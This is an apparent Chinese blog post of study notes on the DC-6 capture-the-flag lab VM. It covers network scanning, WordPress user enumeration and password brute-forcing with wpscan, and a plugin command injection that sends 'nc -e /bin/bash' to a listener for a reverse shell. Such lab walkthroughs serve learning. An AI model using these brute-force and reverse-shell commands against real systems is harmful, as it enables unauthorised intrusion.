dc-6学习记录

一、信息收集

1、利用kscan工具扫描靶机IP

靶机:192.168.209.155
主机:192.168.209.143
在这里插入图片描述

在这里插入图片描述

2、修改dns

在这里插入图片描述

在这里插入图片描述

这里是跳转了,我们需要修改dns

vim /etc/hosts

在这里插入图片描述
将ip和域名添加到新的一行:

192.168.209.155 wordy

在这里插入图片描述

这样就可以访问成功啦!

在这里插入图片描述

3、利用wpscan工具扫描username和passwd

(1)、wappalyzer工具扫描cms

在这里插入图片描述

内容管理系统为WordPress

(2)、利用wpscan工具扫描,获得username

在这里插入图片描述

wpscan --url http://wordy/ --enumerate u

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
扫描得到五个用户名,我们新建文件将他们写进去。

在这里插入图片描述

(3)、根据线索获取passwds

我们在dc-6官方网站发现了线索:
大概意思就是给我们提供了密码
在这里插入图片描述

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

我们在执行这一句命令前,需要解压一下rockyou.txt.gz压缩文件。

gunzip rockyou.txt.gz

在这里插入图片描述

在这里插入图片描述

.gz文件解压

如果是以.gz扩展名结尾的gz文件,可以使用gunzip命令、gzip命令来解压。

在这里插入图片描述

(4)、wpscan工具爆破username和passwds

wpscan --url http://wordy/ -U username.txt -P passwords.txt

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
这里其实要注意,因为刚开始username和passwds两个文件我放的位置不一样,所以一直爆破不出来用户名和对应的密码,于是试验了一下,新建了同一路径的两个文件,放正确的username和passwds,结果能出来,所以我移动了其中一个文件,到另一个文件的相同路径下,结果也就顺利成功了。

4、利用dirsearch工具扫描文件目录

在这里插入图片描述

在这里插入图片描述

二、漏洞挖掘

1、插件漏洞

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

三、漏洞利用

1、反弹shell

kali:

netcat -l -p 4444

抓包后修改信息

baidu.com | nc -e /bin/bash 192.168.124.143 4444

反弹一下交互shell

python -c 'import pty;pty.spawn("/bin/bash")'
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值